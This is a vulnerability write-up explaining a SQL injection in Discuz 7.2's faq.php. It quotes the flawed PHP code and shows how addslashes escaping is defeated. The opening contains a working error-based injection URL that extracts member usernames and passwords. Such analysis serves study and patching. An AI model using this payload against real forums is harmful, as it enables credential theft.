faq.php SQL injection vulnerability analysis for Discuz 7.2

  • 2021-07-10 19:09:52
  • OfStack

Injection example (proof-of-concept URL):


https://www.ofstack.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x20,password) from cdb_members limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

Vulnerability analysis: by phithon


if($action == 'grouppermission') {
...
        ksort($gids);
        $groupids = array();
        foreach($gids as $row) {
                $groupids[] = $row[0];
        }
        $query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");
...
}

function implodeids($array) {
        if(!empty($array)) {
                return "'".implode("','", is_array($array) ? $array : array($array))."'";
        } else {
                return '';
        }
}

The code first defines an array, $groupids, then walks through $gids (also an array: it is $_GET['gids']) and pushes $row[0], the first element of each value, into $groupids.

Why does this operation cause injection?

Discuz runs addslashes over all GET input globally, so a single quote ' becomes \'. If we pass the parameter gids[1]=', it is stored as $gids[1] = \'. When $row is a string rather than an array, PHP's $row[0] is its first character, so the assignment $groupids[] = $row[0] takes just the backslash: the escape character has been separated from the quote it was protecting.

Looking back at the query, the data is passed through implodeids once more before it is placed in the SQL statement, so let us look at that function.

It is simple: it joins the elements of $groupids with ',' and wraps each one in single quotes, returning a string of the form '1','2','3','4'.

But our array now contains a bare escape character, and that backslash escapes the perfectly normal quote that implodeids puts after it. For gids[1]=1&gids[2]='&gids[3]=3&gids[4]=4 the result is:
'1','\','3','4'
Do you see the difference? The fourth single quote has been escaped, so the third and fifth single quotes now pair up as one string literal ('\','), and the 3 that follows sits outside any string, directly in the SQL statement.

In the proof-of-concept URL above, gids[99]=' supplies the backslash and gids[100][0] supplies the payload. Because that second element is itself an array, $row[0] returns the whole string instead of a single character, and since the payload contains no quotes of its own (the separator between username and password is written as 0x20), addslashes leaves it untouched. The clause therefore becomes IN ('\',') and (select ...)#'): everything after the re-paired literal runs as SQL, and the trailing # comments out the closing quote.
